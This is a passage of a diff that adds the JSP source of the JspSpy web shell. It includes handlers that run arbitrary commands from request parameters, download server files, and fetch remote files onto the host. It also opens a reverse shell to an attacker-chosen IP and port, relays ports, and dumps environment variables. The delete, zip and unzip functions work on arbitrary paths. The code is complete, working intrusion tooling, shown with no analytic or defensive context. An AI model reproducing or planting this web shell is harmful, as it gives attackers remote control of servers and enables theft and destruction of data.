Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
"+ +"
"+ +"

Execute Program »

"+ +"

"+ +""+ +""+ +"Parameter
"+ +""+ +"

"+ +"
"+ +"
"+ +"

Execute Shell »

"+ +"

"+ +""+ +""+ +"Parameter
"+ +""+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("
"); +out.println("
");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
"); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.forjj.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
"+ +"
"+ +"

Remote File DownLoad »

"+ +"

"+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if (pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.forjj.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

PortMap >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

"+ +" "+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

Back Connect >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

"+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

System Properties >>

"+ +"
"+ +"
"+ +"
    "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
  • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
    • "); +} +out.println("

System Environment >>

    "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
  • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); +} +out.println("
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
"); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
"); +out.println("

Shell OnLine »


"); +out.println("
"+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
"+ +"
"+ +" "+ +"
"+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
"+ +" " +); +out.println("
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。 +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
"),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%>